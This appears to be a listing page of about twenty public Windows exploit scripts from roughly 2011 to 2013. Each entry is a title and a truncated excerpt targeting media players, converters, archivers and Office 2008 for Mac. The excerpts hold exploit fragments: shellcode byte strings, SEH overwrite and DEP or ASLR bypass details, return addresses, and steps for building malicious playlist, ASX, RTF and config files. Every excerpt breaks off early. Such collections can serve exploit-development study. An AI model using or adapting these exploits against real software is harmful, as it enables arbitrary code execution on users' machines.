DVD-X-Player-5.5-Pro-SEH

DVD X Player 5.5 Pro Bypass ASLR by using non-aslr enabled module SEH Overwrite Egghunter is not needed as there is at least 2000 bytes for shellcode import sys print "====================================" print "DVD X Player 5.5 Pro Buffer Overflow" print " SEH Overwrite - Bypass ASLR " print "...

CoolPlayer-Portable-2.19.2-ASLR

Buffer overflow that bypasses ASLR by using a non-aslr module Tested against CoolPlayer Portable version 2.19.2 on Windows Vista Business 32 bit Written by Blake 233 bytes for shellcode available 227 byte windows/exec shellcode = CMD=calc.exe shellcode=...

Free-MP3-CD-Ripper-1.1-DEP

Exploit Title: Free MP3 CD Ripper 1.1 Universal DEP Bypass Exploit Date: 27\08\2011 Author: C4SS!0 G0M3S Software Link: http://www.brothersoft.com/free-mp3-cd-ripper-84543.html Version: 1.1 from struct import pack from time import sleep import os from sys import exit print ''' Created By C4SS!0...

MP3-CD-Converter-Professional-5.3.0

Exploit Title: MP3 CD Converter Professional Universal DEP Bypass Exploit Date: 11\08\2011 Author: C4SS!0 G0M3S Software Link: http://www.mp3-cd-converter.com/mp3cdconverter.exe from struct import pack from time import sleep from sys import exit print ''' Created By C4SS!0 G0M3S E-mail...

BlazeVideo-HDTV-Player-multi

Take a look at mona.py : awesome tool developed by corelanc0d3r and his team: https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/ this is the old fashioned bug, i just try to make it universal : it has also been exploited by: import struct file = 'blazevideo-universal.plf' totalsize =...

AVCon-DEP-Bypass

DEP Bypass for OptIn/OptOut all modules used are not aslr aware script produces a text file, copy the contents paste in the input field next to the call button discovered by Dillon Beresford import sys from struct import pack around 619 bytes of space before seh overwrite if more space is needed,...

MY-MP3-Player-3.0-m3u

written to bypass OptIn/OptOut DEP policy tested on windows xp sp3 running in virtualbox import sys calc.exe - 1014 bytes of space for shellcode shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"...

Mini-Stream-Ripper-2.9.7-DEP

written to bypass OptIn/OptOut DEP policy tested on windows xp sp3 running in virtualbox import sys calc.exe shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"...

Wav-Player-1.1.3.6-(.pll)

Open the wav player, make a playlist and save it. Then, close the player and run this exploit to create the new playlist. When you open again wav player, you will see the calc. fichero = open"wvplayer.pll", "w" print "+ Creating exploit .pll..." fichero.write"A"1034 Padding fichero.write"t%dA" he...

CCMPlayer-1.5-Stack-based

Exploit: CCMPlayer 1.5 Stack based Buffer Overflow SEH Exploit .m3u Date: 30 Nov 2011 Author: Rh0 Software: CCMPlayer 1.5 m3u = "C:\" shellcode m3u p/p/r m3u Songs - Add - Files of type: m3u - msf.m3u = exploit filecreatem3u...

GOM-Player-2.1.33.5071-ASX-File-Unicode

Exploit Title: GOM Player Crafted ASX File Unicode Stack Buffer Overflow and Arbitrary Code Execution. Version: 2.1.33.5071 Date: 30-11-2011 Author: Debasish Mandal Peter Van Eeckhoutte corelanc0d3r rawinput" Press Enter to generate the crafted ASX..." size = 2046 Shellcode WinExec "Calc.exe"...

Office-2008-sp0-RTF-Pfragments

RTF Pfragments exploit for MAC office 2008 Advanced Hacking Trainings - http://training.aslitsecurity.com Web - http://www.aslitsecurity.com/ Blog - http://www.aslitsecurity.blogspot.com/ Office 2007 for MC SP 0 myfile = "\x7b\x5c\x72\x74\x66\x31\x7b\x5c\x73\x68\x70\x7b\x5c\x73\x70\x7b"...

Mini-stream-RM-MP3-Converter-3.1.2.2

Author : SkY-NeT SySteMs Software Link : http://mini-stream.net/rm-to-mp3-converter/download/ Version : 3.1.2.2 Tested on : Xp Sp 2 import os,sys header= "http://." junk= "\x41" 17416 A ESP = "\x13\x44\x87\x7C" 7C874413 FFE4 JMP ESP NOPS = "\x90" 16 ShellCode =...

Blade-API-Monitor-Unicode-Bypass

This is a super strange exploit. First I would like to commend "FullMetalFouad" for the unicode work on the original exploit. Originally I wanted to see if I could simplify the process. While I was doing that I lost sight of the fact that the instructions had to be printable since we need to copy...

Lattice-Semiconductor-PAC-Designer-6.21

Exploit: Lattice Semiconductor PAC-Designer 6.21 possibly all versions CVE: CVE-2012-2915 Author: b33f Ruben Boonen - http://www.fuzzysecurity.com/ OS: WinXP SP1 Software: http://www.latticesemi.com/products/designsoftware/pacdesigner/index.cfm filename="evil.PAC" PAC1 = """ 1 ispPAC-CLK5410D...

FormatFactory-3.0.1-Profile

Exploit Title: FormatFactory v3.0.1 Profile File Handling Buffer Overflow Version: 3.0.1 Date: 2012-11-19 Author: Julien Ahrens @MrTuxracer Homepage: http://www.inshell.net from struct import pack file="profile.ini" junk1="\xCC" 260 nseh="\xeb\x06\x90\x90" eip=pack'L',0x024C1923 CALL DWORD PTR...

Zoner-Photo-Studio-15-Build-3

Exploit Title: Zoner Photo Studio v15 Build 3 Zps.exe Registry Value Parsing Local Buffer Overflow Version: 15 Build 3, Build 2 Date: 2012-11-09 Author: Julien Ahrens from struct import pack file="poc.reg" junk1="\xCC" 2136 nseh="\xeb\x06\x90\x90" eip=pack'L',0x0C7D8F13 JMP DWORD PTR SS:EBP-18 -...

NCMedia-Sound-Editor-Pro-7.5.1

Exploit Title: NCMedia Sound Editor Pro v7.5.1 MRUList201202.dat File Handling Local Buffer Overflow Version: 7.5.1 Date: 2012-08-07 Author: Julien Ahrens Website: http://www.inshell.net Software Link: http://www.soundeditorpro.com/ from struct import pack file="MRUList201202.dat" windows/exec...

FuzeZip-1.0.0.131625-SEH

Date: 16.Apr.2013 Vulnerability reported Exploit Author: Josep Pi Rodriguez, Pedro Guillen Nunez , Miguel Angel de Castro Simon Organization: RealPentesting Vendor Homepage: http://fuzezip.com/ Software Link: http://download.fuzezip.com/FuzeZipSetup.exe Version: 1.0.0.131625 header1 =...

WinArchiver-3.2-SEH

Exploit Title: Winarchiver V 3.2 SEH Overflow Date: April 24, 2013 Exploit Author: Josep Pi Rodriguez, Pedro Guillen Nunez , Miguel Angel de Castro Simon Organization: RealPentesting Vendor Homepage: http://winarchiver.com Software Link: http://www.winarchiver.com/WinArchiver3.exe zipheader =...